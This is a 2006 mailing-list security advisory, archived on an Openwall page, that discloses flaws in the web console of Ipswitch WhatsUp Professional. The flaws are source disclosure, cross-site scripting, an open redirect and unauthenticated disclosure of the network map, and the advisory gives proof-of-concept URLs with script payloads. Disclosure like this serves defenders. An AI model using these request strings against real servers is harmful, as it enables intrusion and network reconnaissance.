lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <405cf7f40605111506q5173d57dk7ec31a3d3edd1caa@mail.gmail.com>
Date: Thu May 11 23:06:58 2006
From: david.maciejak at gmail.com (David Maciejak)
Subject: Ipswitch WhatsUp Professional multiple flaws

WhatsUp is a tool from Ipswitch to monitor application and network,
embedding a custom web server on port 8022.

Description:

This custom web server is prone to multiple flaws.

-as authenticated user:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*there are many XSS flaws, as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("me");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT>
http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=32&btnPing=Ping

*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr

-not being authenticated:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0



The weaknesses have been confirmed in version 2006, source disclosure
in version 2005 and 2005 SP1 too.
Other versions may also be affected.

No response from vendor.

Solution:
-Filtered TCP port 8022, ask a patch from vendor if you are a registered user
-Keep an eye on an opensource project: http://gnms.rubyforge.org


David Maciejak

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ